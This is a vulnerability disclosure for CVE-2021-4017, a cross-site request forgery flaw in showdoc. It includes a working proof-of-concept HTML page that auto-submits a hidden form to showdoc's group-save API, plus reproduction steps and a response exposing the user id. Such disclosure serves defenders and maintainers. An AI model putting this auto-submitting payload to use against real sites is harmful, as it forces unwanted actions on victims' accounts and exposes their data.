Headline
CVE-2021-4017: Cross-Site Request Forgery (CSRF) in showdoc
showdoc is vulnerable to Cross-Site Request Forgery (CSRF)
Description
An attacker is able to create a new group for any item if users visit the attacker’s website. Furthermore, the user-id “uid” is also exposed via the JSON response.
We can bypass the CSRF Protection if we put our payload on an iframe or an HTML file and then send them to the victim.
Proof of Concept
Poc.html
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://www.showdoc.com.cn/server/index.php?s=/api/itemGroup/save" method="POST">
<input type="hidden" name="group_name" value="testcsrf" />
<input type="hidden" name="id" value="" />
<input type="hidden" name="item_ids" value="1704644990568304" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
Steps to Reproduce
1.Open the PoC.html in any browser.
2.Now you can check that a new group named testcsrf is created with the item that has id=1704644990568304 is added to that group.
Furthermore, the user id uid is also exposed via the JSON response:
{"error_code":0,"data":{"id":"2002","uid":"359287","group_name":"testcsrf","item_ids":"1704644990568304","s_number":"0","created_at":"2021-11-21 12:10:25","updated_at":"2021-11-21 12:10:25"}}
Video PoC
You can check my video PoC here: PoC
Impact
This can result in the exposure of data or unintended code execution.